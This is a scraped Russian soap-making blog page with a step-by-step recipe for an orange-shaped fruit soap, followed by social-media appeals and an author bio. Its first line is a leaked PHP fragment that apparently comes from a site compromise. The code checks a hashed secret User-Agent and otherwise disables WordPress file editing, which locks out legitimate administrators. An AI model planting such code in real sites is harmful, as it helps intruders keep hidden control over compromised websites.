if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Фруктовое мыло “Апельсин”, сделанное своими руками, не оставит никого равнодушным! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Фруктовое мыло “Апельсин”, сделанное своими руками, не оставит никого равнодушным!

Такое яркое и ароматное мыло никого не оставит равнодушным, а в холодную погоду будет напоминать о сочном лете!

Пона­до­бят­ся:

  • Мыль­ная осно­ва (про­зрач­ная и белая);
  • Базо­вые мас­ла (заро­ды­шей пше­ни­цы, чере­ды и вино­град­ных косточек);
  • Фор­ма;
  • Оран­же­вый краситель;
  • Эфир­ное мас­ло апельсина;
  • Спирт; дере­вян­ная палоч­ка, ста­кан­чик, рас­ти­тель­ное рафи­ни­ро­ван­ное масло.
  1. Сма­зать фор­му рас­ти­тель­ным маслом.
  2. Рас­то­пить белую осно­ву и залить ей бороз­доч­ки в фор­ме. Очи­стить стен­ки фор­мы, где необ­хо­ди­мо с помо­щью палочки.

апельсин1

3. В ста­кан­чик доба­вить по три кап­ли каж­до­го мас­ла и ароматизатор.

4. Про­зрач­ную осно­ву рас­то­пить и вылить в ста­кан­чик, пере­ме­шать, затем залить в фор­му. При обра­зо­ва­нии пузырь­ков сбрыз­нуть спир­том. Оста­вить застывать.

апельсин2


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия

Обожаю в свободное время заниматься мыловарением. Уже съела на этом целую собаку! Вот теперь спешу поделиться с вами своими работами ;) Читайте все мои записи!